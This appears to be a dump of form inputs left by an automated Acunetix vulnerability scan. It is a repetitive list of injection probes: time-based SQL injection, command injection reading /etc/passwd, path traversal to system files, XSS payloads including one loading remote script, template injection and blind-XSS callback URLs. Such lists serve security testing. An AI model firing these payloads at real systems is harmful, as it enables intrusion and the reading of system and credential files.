if(now()=sysdate(),sleep(9),0)/*'XOR(if(now()=sysdate(),sleep(9),0))OR'"XOR(if(now()=sysdate(),sleep(9),0))OR"*/

1

1

"&cat /etc/passwd&"

SomeCustomInjectedHeader:injected_by_wvs

1

1<ScRiPt%20>prompt(938308)</sCripT>

1

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

1

1

WEB-INF\web.xml

1

(select(0)from(select(sleep(3)))v)/*'+(select(0)from(select(sleep(3)))v)+'"+(select(0)from(select(sleep(3)))v)+"*/

cat /etc/passwd

1

1&lt

${99485+100290}

1

1

1

`cat /etc/passwd`

1

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1

-1

1

1

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

\xf6<img acu onmouseover=prompt(979209) //\xf6>

1

/../..//../..//../..//../..//../..//etc/passwd.jpg

-1)

1

1&n919824=v983080

|cat /etc/passwd#

1<input autofocus onfocus=prompt(942588)>

1some_inexistent_file_with_long_name%00.jpg

)

1

'|'ld

1

1

.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd

-1))

1

!(()&&!|*|*|

<a href='http://www.acunetix.com'>website security</a>

'"()

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

"|"ld

/etc/passwd

hCkoB4Uv'

1

1

^(#$!@#$)(()))******

testasp.vulnweb.com

1

[url=http://www.acunetix.com]website security[/url]

XlV7ssdp')

1

1

1

'

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

Pc47iesP'))

1_vvnMV <ScRiPt >prompt(970039)</ScRiPt>

1

1

'

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

"

1

1

-1

"

http://testasp.vulnweb.com/t/xss.html?%00.jpg

1

1

1

-1)

${@print(md5(acunetix_wvs_security_test))}

1

..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xafetc/passwd

1

1

-1))

1

1

||cat /etc/passwd

1

1

acunetix_wvs_invalid_filename

http://hitmOi5f7YyNq.bxss.me/

${@print(md5(acunetix_wvs_security_test))}\

&dir

1

1

KF5InkX4'

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

1

1

comments

1

file:///etc/passwd

1

iH1jOO2e')

1

http://www.acunetix.tst

'&dir&'

comments

1

'"

/\../\../\../\../\../\../\../etc/passwd

2unTqTL7'))

1'"()&%<ScRiPt >prompt(970906)</ScRiPt>

<!--

1

1

comments/.

"&dir&"

1

WEB-INF/web.xml

1

'"()&%<ScRiPt >prompt(912782)</ScRiPt>

|dir

1

1

1

1

WEB-INF\web.xml

1_918334

1

1

1

'|dir

../../../../../../../../../../windows/win.ini

1

1

1

1

1

"|dir

../../../../../../../../../../boot.ini

1

1

1

../../../../../../../../../../windows/win.ini.jpg

1

1

1

\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xafwindows\xc0\xafwin.ini

1

1

acu7326\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9uca7326

................windowswin.ini

1

1

acux2526\xc0\xbez1\xc0\xbcz2a\x90bcxuca2526

1

..\..\..\..\..\..\..\..\windows\win.ini

1

1

1<ScRiPt >prompt(938305)</ScRiPt>

1

/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini

1

1

1

1<script>prompt(944587)</script>

1

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

1<ScRiPt >prompt(957471)</ScRiPt>

1

1

1

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?903303></ScRiPt>

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

1

1

1

1<ScRiPt >prompt(913213)</ScRiPt>

1

&cat /etc/passwd&

1

response.write(9562205*9237282)

1

1<video><source onerror="javascript:prompt(982701)">

1

WEB-INF/web.xml

'+response.write(9562205*9237282)+'

'&cat /etc/passwd&'

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(986363)"></g></svg>

../../../../../../../../../../etc/passwd

1

1

SomeCustomInjectedHeader:injected_by_wvs

WEB-INF\web.xml

"+response.write(9562205*9237282)+"

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

"&cat /etc/passwd&"

1<div style=width:expression(prompt(972117))>

1

1

1

1

1

SomeCustomInjectedHeader:injected_by_wvs

cat /etc/passwd

../../../../../../../../../../etc/passwd.jpg

1<iframe src='data:text/html

1

1

`cat /etc/passwd`

1

if(now()=sysdate(),sleep(6),0)/*'XOR(if(now()=sysdate(),sleep(6),0))OR'"XOR(if(now()=sysdate(),sleep(6),0))OR"*/

SomeCustomInjectedHeader:injected_by_wvs

1

1

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

1

1<body onload=prompt(985472)>

1

1

(select(0)from(select(sleep(9)))v)/*'+(select(0)from(select(sleep(9)))v)+'"+(select(0)from(select(sleep(9)))v)+"*/

|cat /etc/passwd#

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1

1

1

-1

1

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(991263)>

1

1

${100371+99444}

1

'|'ld

/../..//../..//../..//../..//../..//etc/passwd.jpg

-1)

1

1

1<img src=xyz OnErRor=prompt(921993)>

1

1

1

.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd

1&n923563=v956947

-1))

"|"ld

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

)

1

1

1<img/src=">" onerror=alert(989182)>

/etc/passwd

1

1some_inexistent_file_with_long_name%00.jpg

!(()&&!|*|*|

YrzvZQaL'

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

1<ScRiPt%20>prompt(950059)</sCripT>

1

1

'"()

'

nuergFxC')

^(#$!@#$)(()))******

testasp.vulnweb.com

1&lt

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

1

'

1

1

P0RGE2NA'))

..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xafetc/passwd

\xf6<img acu onmouseover=prompt(913864) //\xf6>

1

1

"

http://testasp.vulnweb.com/t/xss.html?%00.jpg

1

-1

1

"

1<input autofocus onfocus=prompt(946338)>

||cat /etc/passwd

1

1

1

-1)

file:///etc/passwd

<a href='http://www.acunetix.com'>website security</a>

${@print(md5(acunetix_wvs_security_test))}

1

1

-1))

1

1

&dir

http://hitIQ5FJ7Z9yO.bxss.me/

[url=http://www.acunetix.com]website security[/url]

1

acunetix_wvs_invalid_filename

${@print(md5(acunetix_wvs_security_test))}\

/\../\../\../\../\../\../\../etc/passwd

Mu091JOZ'

1

1

1_53jI2 <ScRiPt >prompt(973190)</ScRiPt>

'&dir&'

1

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

WEB-INF/web.xml

fyCrsBu1')

1

comments

1

"&dir&"

1

http://www.acunetix.tst

1

1

WEB-INF\web.xml

lsyOHdZb'))

1

comments

|dir

'"

1

1

../../../../../../../../../../windows/win.ini

1

1'"()&%<ScRiPt >prompt(900475)</ScRiPt>

'|dir

1

comments/.

1

<!--

'"()&%<ScRiPt >prompt(920088)</ScRiPt>

1

../../../../../../../../../../boot.ini

1

1

1

1

"|dir

1_994008

1

1

../../../../../../../../../../windows/win.ini.jpg

1

1

1

1

1

\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xafwindows\xc0\xafwin.ini

1

1

1

1

1

1

1

................windowswin.ini

acu7224\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9uca7224

1

1

1

1

..\..\..\..\..\..\..\..\windows\win.ini

acux9930\xc0\xbez1\xc0\xbcz2a\x90bcxuca9930

1

1

1

1<ScRiPt >prompt(999798)</ScRiPt>

/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini

1

1

1

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

1

1

1<script>prompt(933659)</script>

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

1

1<ScRiPt >prompt(960901)</ScRiPt>

1

1

1

1

1

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?996304></ScRiPt>

WEB-INF/web.xml

1

1<ScRiPt >prompt(949822)</ScRiPt>

1

1

WEB-INF\web.xml

1

1<video><source onerror="javascript:prompt(975673)">

response.write(9832471*9180975)

1

1

1

1

'+response.write(9832471*9180975)+'

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(973782)"></g></svg>

1

1

&cat /etc/passwd&

1

"+response.write(9832471*9180975)+"

1

1<div style=width:expression(prompt(940409))>

../../../../../../../../../../etc/passwd

SomeCustomInjectedHeader:injected_by_wvs

1

1

1

'&cat /etc/passwd&'

1

1

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

SomeCustomInjectedHeader:injected_by_wvs

1

1<iframe src='data:text/html

../../../../../../../../../../etc/passwd.jpg

"&cat /etc/passwd&"

1

1

if(now()=sysdate(),sleep(3),0)/*'XOR(if(now()=sysdate(),sleep(3),0))OR'"XOR(if(now()=sysdate(),sleep(3),0))OR"*/

${100361+99344}

1

1<body onload=prompt(949518)>

SomeCustomInjectedHeader:injected_by_wvs

(select(0)from(select(sleep(6)))v)/*'+(select(0)from(select(sleep(6)))v)+'"+(select(0)from(select(sleep(6)))v)+"*/

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

1

1

cat /etc/passwd

-1

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(908138)>

1

1

1

1

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

`cat /etc/passwd`

-1)

1

1&n946883=v945964

1

1<img src=xyz OnErRor=prompt(953242)>

1

)

/../..//../..//../..//../..//../..//etc/passwd.jpg

|cat /etc/passwd#

-1))

1some_inexistent_file_with_long_name%00.jpg

1

1

1

1<img/src=">" onerror=alert(978549)>

1

!(()&&!|*|*|

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

'|'ld

.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd

maP8YNBS'

testasp.vulnweb.com

1

1<ScRiPt%20>prompt(931977)</sCripT>

^(#$!@#$)(()))******

'"()

http://testasp.vulnweb.com/t/xss.html?%00.jpg

1

/etc/passwd

"|"ld

PkSGFMyY')

1

1

'

1

1

1&lt

1

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

pubrGhQH'))

1

1

1

\xf6<img acu onmouseover=prompt(981724) //\xf6>

"

1

http://hitjVt9kCQOXR.bxss.me/

acunetix_wvs_invalid_filename

'

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

-1

${@print(md5(acunetix_wvs_security_test))}

1

1

1<input autofocus onfocus=prompt(926277)>

1

${@print(md5(acunetix_wvs_security_test))}\

..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xafetc/passwd

"

1

comments

-1)

1

<a href='http://www.acunetix.com'>website security</a>

1

1

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

comments

-1))

||cat /etc/passwd

http://www.acunetix.tst

1

[url=http://www.acunetix.com]website security[/url]

1

1

comments/.

VGzLf8cF'

&dir

1_hZ5jy <ScRiPt >prompt(904670)</ScRiPt>

'"

1

file:///etc/passwd

'&dir&'

1

1

1

1

QK5ORPck')

1

/\../\../\../\../\../\../\../etc/passwd

<!--

1'"()&%<ScRiPt >prompt(940000)</ScRiPt>

"&dir&"

1

yyuVHdSD'))

1

1

1

WEB-INF/web.xml

|dir

1

'"()&%<ScRiPt >prompt(906375)</ScRiPt>

1

1

WEB-INF\web.xml

1

1

1

1

1

'|dir

1_918537

1

../../../../../../../../../../windows/win.ini

1

"|dir

1

1

../../../../../../../../../../boot.ini

1

1

../../../../../../../../../../windows/win.ini.jpg

1

1

1

\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xafwindows\xc0\xafwin.ini

1

1

1

................windowswin.ini

acu4157\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9uca4157

1

1

1

..\..\..\..\..\..\..\..\windows\win.ini

1

acux5755\xc0\xbez1\xc0\xbcz2a\x90bcxuca5755

1

1

/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini

1

1<ScRiPt >prompt(911262)</ScRiPt>

1

1

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

1

1

1<script>prompt(975261)</script>

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

response.write(9628558*9413789)

1

1<ScRiPt >prompt(911082)</ScRiPt>

1

1

1

'+response.write(9628558*9413789)+'

1

&cat /etc/passwd&

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?917496></ScRiPt>

SomeCustomInjectedHeader:injected_by_wvs

"+response.write(9628558*9413789)+"

1

1

WEB-INF/web.xml

1<ScRiPt >prompt(964790)</ScRiPt>

'&cat /etc/passwd&'

1

SomeCustomInjectedHeader:injected_by_wvs

1

1<video><source onerror="javascript:prompt(960798)">

WEB-INF\web.xml

1

1

../../../../../../../../../../etc/passwd

1

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(987936)"></g></svg>

1

"&cat /etc/passwd&"

SomeCustomInjectedHeader:injected_by_wvs

1

if(now()=sysdate(),sleep(9),0)/*'XOR(if(now()=sysdate(),sleep(9),0))OR'"XOR(if(now()=sysdate(),sleep(9),0))OR"*/

1

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1

${99358+99541}

1

cat /etc/passwd

1

1<div style=width:expression(prompt(950593))>

1

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

(select(0)from(select(sleep(3)))v)/*'+(select(0)from(select(sleep(3)))v)+'"+(select(0)from(select(sleep(3)))v)+"*/

1

1

../../../../../../../../../../etc/passwd.jpg

1&n927912=v937544

`cat /etc/passwd`

-1

1

1

1<iframe src='data:text/html

1some_inexistent_file_with_long_name%00.jpg

|cat /etc/passwd#

-1)

1

1

)

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

1

1

1<body onload=prompt(906273)>

'|'ld

testasp.vulnweb.com

1

!(()&&!|*|*|

-1))

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1

"|"ld

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(905907)>

1

1

^(#$!@#$)(()))******

'"()

/../..//../..//../..//../..//../..//etc/passwd.jpg

lKAe9coc'

'

1

1

1

1

1

1<img src=xyz OnErRor=prompt(922789)>

'

"

hli1pAJO')

.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd

1

1

1<img/src=">" onerror=alert(911387)>

1

1

1

"

${@print(md5(acunetix_wvs_security_test))}

http://testasp.vulnweb.com/t/xss.html?%00.jpg

/etc/passwd

1

tljRzHgH'))

1<ScRiPt%20>prompt(913116)</sCripT>

1

${@print(md5(acunetix_wvs_security_test))}\

1

1

1

||cat /etc/passwd

1

-1

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

1&lt

http://hitgVru0mAV5B.bxss.me/

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

&dir

acunetix_wvs_invalid_filename

1

\xf6<img acu onmouseover=prompt(974680) //\xf6>

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

-1)

1

1

1

'&dir&'

comments

1

1<input autofocus onfocus=prompt(975873)>

1

http://www.acunetix.tst

-1))

..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xafetc/passwd

1

'"

1'"()&%<ScRiPt >prompt(927214)</ScRiPt>

<a href='http://www.acunetix.com'>website security</a>

"&dir&"

comments

1

1

1

<!--

x6ypTt1q'

'"()&%<ScRiPt >prompt(925749)</ScRiPt>

1

|dir

comments/.

[url=http://www.acunetix.com]website security[/url]

DMCHe1Z8')

1_936617

1

file:///etc/passwd

1

1_fKat1 <ScRiPt >prompt(994504)</ScRiPt>

jvuPWYCq'))

1

'|dir

1

1

1

/\../\../\../\../\../\../\../etc/passwd

"|dir

1

1

WEB-INF/web.xml

1

1

1

1

1

WEB-INF\web.xml

1

1

1

1

1

acu6093\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9uca6093

../../../../../../../../../../windows/win.ini

1

acux9333\xc0\xbez1\xc0\xbcz2a\x90bcxuca9333

1

../../../../../../../../../../boot.ini

1<ScRiPt >prompt(966871)</ScRiPt>

../../../../../../../../../../windows/win.ini.jpg

1

1

1<script>prompt(957250)</script>

1

1

\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xafwindows\xc0\xafwin.ini

1

1

1<ScRiPt >prompt(900065)</ScRiPt>

................windowswin.ini

1

1

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?985714></ScRiPt>

1

1

..\..\..\..\..\..\..\..\windows\win.ini

1

1

1<ScRiPt >prompt(970805)</ScRiPt>

/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini

1

1

1

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

1<video><source onerror="javascript:prompt(931182)">

1

1

1

1

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(969142)"></g></svg>

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

1

1

response.write(9698704*9542543)

1<div style=width:expression(prompt(961711))>

1

'+response.write(9698704*9542543)+'

WEB-INF/web.xml

1

1

1<iframe src='data:text/html

1

"+response.write(9698704*9542543)+"

SomeCustomInjectedHeader:injected_by_wvs

WEB-INF\web.xml

1<body onload=prompt(933978)>

1

SomeCustomInjectedHeader:injected_by_wvs

1

1

&cat /etc/passwd&

1

SomeCustomInjectedHeader:injected_by_wvs

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(959995)>

../../../../../../../../../../etc/passwd

1

1

'&cat /etc/passwd&'

1

1

1

1

1

1

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1<img src=xyz OnErRor=prompt(974889)>

1

1

"&cat /etc/passwd&"

1

1

1

../../../../../../../../../../etc/passwd.jpg

1<img/src=">" onerror=alert(914083)>

1

if(now()=sysdate(),sleep(6),0)/*'XOR(if(now()=sysdate(),sleep(6),0))OR'"XOR(if(now()=sysdate(),sleep(6),0))OR"*/

1

1

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

cat /etc/passwd

${100133+99251}

1

1&n981227=v945169

(select(0)from(select(sleep(9)))v)/*'+(select(0)from(select(sleep(9)))v)+'"+(select(0)from(select(sleep(9)))v)+"*/

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

1

1<ScRiPt%20>prompt(925449)</sCripT>

1some_inexistent_file_with_long_name%00.jpg

1

`cat /etc/passwd`

1

1

1

-1

1&lt

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

)

1

-1)

|cat /etc/passwd#

\xf6<img acu onmouseover=prompt(985307) //\xf6>

'

!(()&&!|*|*|

/../..//../..//../..//../..//../..//etc/passwd.jpg

testasp.vulnweb.com

1

1<input autofocus onfocus=prompt(952311)>

'"()

'|'ld

http://testasp.vulnweb.com/t/xss.html?%00.jpg

-1))

"

1

.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd

1

^(#$!@#$)(()))******

1

<a href='http://www.acunetix.com'>website security</a>

${@print(md5(acunetix_wvs_security_test))}

aod0KVKg'

"|"ld

1

1

[url=http://www.acunetix.com]website security[/url]

1

/etc/passwd

1

1

iVqD05Yu')

${@print(md5(acunetix_wvs_security_test))}\

1

1_WFfhQ <ScRiPt >prompt(929882)</ScRiPt>

http://hit7Ix3EUqzSJ.bxss.me/

1

1

9o7x4say'))

1

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

1

1

1

'

acunetix_wvs_invalid_filename

1

-1

1

1

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

comments

1

1

1

"

-1)

http://www.acunetix.tst

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

1

comments

||cat /etc/passwd

1

1

1

-1))

..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xafetc/passwd

'"

comments/.

1

1Wca6Rpf'

1'"()&%<ScRiPt >prompt(905641)</ScRiPt>

&dir

1

1

1

<!--

1

EELHASQ4')

'&dir&'

'"()&%<ScRiPt >prompt(956986)</ScRiPt>

1

1

hGbqQcyj'))

file:///etc/passwd

1

1_978836

1

"&dir&"

/\../\../\../\../\../\../\../etc/passwd

1

1

1

1

1

WEB-INF/web.xml

|dir

1

1

WEB-INF\web.xml

'|dir

1

../../../../../../../../../../windows/win.ini

1

"|dir

acu3247\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9uca3247

../../../../../../../../../../boot.ini

1

acux10298\xc0\xbez1\xc0\xbcz2a\x90bcxuca10298

1

1

1<ScRiPt >prompt(987159)</ScRiPt>

1

../../../../../../../../../../windows/win.ini.jpg

1

1

1<script>prompt(951270)</script>

1

\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xafwindows\xc0\xafwin.ini

1

1<ScRiPt >prompt(985024)</ScRiPt>

1

1

1

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?961073></ScRiPt>

1

................windowswin.ini

1

1

response.write(9980260*9900684)

1

1<ScRiPt >prompt(939209)</ScRiPt>

'+response.write(9980260*9900684)+'

1

..\..\..\..\..\..\..\..\windows\win.ini

1

1

1

1<video><source onerror="javascript:prompt(949996)">

"+response.write(9980260*9900684)+"

1

/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini

1

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(983381)"></g></svg>

1

&cat /etc/passwd&

1

SomeCustomInjectedHeader:injected_by_wvs

1

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

1

1

1<div style=width:expression(prompt(981373))>

1

1

'&cat /etc/passwd&'

SomeCustomInjectedHeader:injected_by_wvs

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

if(now()=sysdate(),sleep(3),0)/*'XOR(if(now()=sysdate(),sleep(3),0))OR'"XOR(if(now()=sysdate(),sleep(3),0))OR"*/

1

1<iframe src='data:text/html

1

1

"&cat /etc/passwd&"

SomeCustomInjectedHeader:injected_by_wvs

1

(select(0)from(select(sleep(6)))v)/*'+(select(0)from(select(sleep(6)))v)+'"+(select(0)from(select(sleep(6)))v)+"*/

../../../../../../../../../../etc/passwd

${100372+100324}

1

1

1<body onload=prompt(997841)>

cat /etc/passwd

WEB-INF/web.xml

1

1

-1

1

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

WEB-INF\web.xml

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(945287)>

1

1

`cat /etc/passwd`

1

1&n908599=v965863

-1)

../../../../../../../../../../etc/passwd.jpg

1<img src=xyz OnErRor=prompt(921261)>

1some_inexistent_file_with_long_name%00.jpg

1

|cat /etc/passwd#

)

1

1

1<img/src=">" onerror=alert(978819)>

1

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

-1))

1

!(()&&!|*|*|

'|'ld

1

1<ScRiPt%20>prompt(971882)</sCripT>

mzT6suKZ'

testasp.vulnweb.com

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

'"()

1&lt

1

"|"ld

^(#$!@#$)(()))******

1

/../..//../..//../..//../..//../..//etc/passwd.jpg

1

'

1

s7g7kCk9')

\xf6<img acu onmouseover=prompt(928376) //\xf6>

.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd

1

1

1

"

1

1<input autofocus onfocus=prompt(930298)>

1

3431N8Xk'))

/etc/passwd

1

1

${@print(md5(acunetix_wvs_security_test))}

http://testasp.vulnweb.com/t/xss.html?%00.jpg

'

1

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

1

-1

1

<a href='http://www.acunetix.com'>website security</a>

"

1

1

${@print(md5(acunetix_wvs_security_test))}\

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

||cat /etc/passwd

-1)

1

1

[url=http://www.acunetix.com]website security[/url]

..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xafetc/passwd

1

http://hitgZiLLPhC25.bxss.me/

1

1

1_ITP45 <ScRiPt >prompt(972663)</ScRiPt>

-1))

1

&dir

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

1

acunetix_wvs_invalid_filename

1

1

http://www.acunetix.tst

1

4SS2KRYe'

1

1

'&dir&'

comments

1

1

file:///etc/passwd

1'"()&%<ScRiPt >prompt(965283)</ScRiPt>

1

TzhZWLdU')

'"

/\../\../\../\../\../\../\../etc/passwd

1

1

1

"&dir&"

comments

<!--

zbairGFW'))

1

'"()&%<ScRiPt >prompt(935612)</ScRiPt>

|dir

comments/.

1

WEB-INF/web.xml

1

1

1

1_934816

WEB-INF\web.xml

1

'|dir

1

1

1

../../../../../../../../../../windows/win.ini

"|dir

1

1

../../../../../../../../../../boot.ini

1

1

../../../../../../../../../../windows/win.ini.jpg

1

acu2162\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9uca2162

1

1

1

1

\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xafwindows\xc0\xafwin.ini

acux4242\xc0\xbez1\xc0\xbcz2a\x90bcxuca4242

1

1

1<ScRiPt >prompt(971639)</ScRiPt>

................windowswin.ini

1

1

1

..\..\..\..\..\..\..\..\windows\win.ini

1<script>prompt(956227)</script>

1

1

/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini

1<ScRiPt >prompt(911265)</ScRiPt>

1

1

1

1

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?927603></ScRiPt>

1

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

1

1<ScRiPt >prompt(983745)</ScRiPt>

1

1

1<video><source onerror="javascript:prompt(987430)">

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

1

1

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(929552)"></g></svg>

1

1

1

WEB-INF/web.xml

response.write(9616925*9291393)

1

1<div style=width:expression(prompt(970529))>

1

1

1<iframe src='data:text/html

'+response.write(9616925*9291393)+'

1

&cat /etc/passwd&

1

1

WEB-INF\web.xml

1<body onload=prompt(976972)>

1

"+response.write(9616925*9291393)+"

1

'&cat /etc/passwd&'

1

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(935854)>

1

